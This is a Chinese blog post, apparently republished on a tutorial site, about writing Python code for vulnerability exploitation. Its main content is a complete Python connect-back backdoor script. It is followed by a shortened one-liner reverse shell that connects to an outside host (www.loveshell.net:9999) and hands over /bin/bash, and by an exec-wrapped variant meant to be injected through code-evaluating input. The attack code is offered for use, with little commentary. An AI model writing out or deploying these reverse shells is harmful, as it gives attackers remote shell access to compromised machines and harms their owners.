首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

在漏洞利用Python代码真的很爽

Posted in Python onAugust 26, 2007

不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
# Python Connect-back Backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006

import sys
import os
import socket
shell = "/bin/sh"

def usage(programname):
  print "Python Connect-back Backdoor"
  print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
  print "Date: July 15th 2006\n"
  print "Usage: %s <conn_back_host> <port>\n" % programname

def main():
  if len(sys.argv) != 3: 
    usage(sys.argv[0])
    sys.exit(1)

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try: 
    s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
    print "[+] Connect ok." 
  except: 
    print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
    sys.exit(2)
  s.send("-------------------- Python Connect-back Backdoor --------------------\n")
  s.send("----------------------------- By wofeiwo -----------------------------\n")
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  global shell
  os.system(shell)
  print "See U!"
  s.close()

if __name__ == "__main__": main()

用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\r\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\r\n");os.system("/bin/bash");s.close();s.send("See u next time!\r\n");

如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\\r\\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\\r\\n");os.system("/bin/bash");s.close();s.send("See u next time!\\r\\n");';

注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句

eval语句用来计算存储在字符串中的有效Python表达式

呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......

在漏洞利用Python代码真的很爽

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
python 中文乱码问题深入分析
Mar 13 Python
python实现模拟按键,自动翻页看u17漫画
Mar 17 Python
python3 图片referer防盗链的实现方法
Mar 12 Python
10 行 Python 代码教你自动发送短信(不想回复工作邮件妙招)
Oct 11 Python
python找出完数的方法
Nov 12 Python
pandas求两个表格不相交的集合方法
Dec 08 Python
Python实现去除图片中指定颜色的像素功能示例
Apr 13 Python
Python3简单实现串口通信的方法
Jun 12 Python
Python的numpy库下的几个小函数的用法(小结)
Jul 12 Python
Python类继承和多态原理解析
Feb 05 Python
keras用auc做metrics以及早停实例
Jul 02 Python
一文带你了解Python 四种常见基础爬虫方法介绍
Dec 04 Python
python编程-将Python程序转化为可执行程序[整理]
Apr 09 #Python
python的几种开发工具介绍
Mar 07 #Python
王纯业的Python学习笔记 下载
Feb 10 #Python
一篇不错的Python入门教程
Feb 08 #Python
Python学习资料
Feb 08 #Python
Python完全新手教程
Feb 08 #Python
简明 Python 基础学习教程
Feb 08 #Python
CompletableFuture(1) 计算器(5) Springboot-cli(1) format(1) 图像处理(1) 异步回调(1) 五子棋(12) 对齐打印(1) 底部导航(1) 井字棋(1)
You might like
PHP链表操作简单示例
2016/10/15 PHP
Yii2.0使用阿里云OSS的SDK上传图片、下载、删除图片示例
2017/09/20 PHP
php往mysql中批量插入数据实例教程
2018/12/12 PHP
PHP的new static和new self的区别与使用
2019/11/27 PHP
根据分辩率调用不同的CSS.
2007/01/08 Javascript
JavaScript 学习笔记(六)
2009/12/31 Javascript
javascript中input中readonly和disabled区别介绍
2012/10/23 Javascript
JS读取XML文件示例代码
2013/11/15 Javascript
js动态拼接正则表达式的两种方法
2014/03/04 Javascript
Javascript中的回调函数和匿名函数的回调示例介绍
2014/05/12 Javascript
浅谈JavaScript中的字符编码转换问题
2015/07/07 Javascript
js实现网页多级级联菜单代码
2015/08/20 Javascript
addeventlistener监听scroll跟touch(实例讲解)
2017/08/04 Javascript
vue组件name的作用小结
2018/05/23 Javascript
在vue中获取微信支付code及code被占用问题的解决方法
2019/04/16 Javascript
JS浮点数运算结果不精确的Bug解决
2019/08/01 Javascript
微信小程序实现页面分享onShareAppMessage
2019/08/12 Javascript
使用layui实现的左侧菜单栏以及动态操作tab项方法
2019/09/10 Javascript
python实现通过代理服务器访问远程url的方法
2015/04/29 Python
python模块之time模块(实例讲解)
2017/09/13 Python
Python输入二维数组方法
2018/04/13 Python
python3.6.3+opencv3.3.0实现动态人脸捕获
2018/05/25 Python
python 批量修改/替换数据的实例
2018/07/25 Python
Python3实现的反转单链表算法示例
2019/03/08 Python
Python操作列表常用方法实例小结【创建、遍历、统计、切片等】
2019/10/25 Python
PyCharm Anaconda配置PyQt5开发环境及创建项目的教程详解
2020/03/24 Python
一篇文章教你用python画动态爱心表白
2020/11/22 Python
HTML+CSS3 模仿Windows7 桌面效果
2010/06/17 HTML / CSS
巴西食品补充剂在线零售商:Músculos na Web
2017/08/07 全球购物
全民健身日活动方案
2014/01/29 职场文书
预备党员入党自我评价范文
2014/03/10 职场文书
2015年生活老师工作总结
2015/05/27 职场文书
幼儿园教师心得体会范文
2016/01/21 职场文书
ajax请求前端跨域问题原因及解决方案
2021/10/16 Javascript
python中字符串String及其常见操作指南(方法、函数)
2022/04/06 Python
CSS list-style-type属性使用方法
2023/05/21 HTML / CSS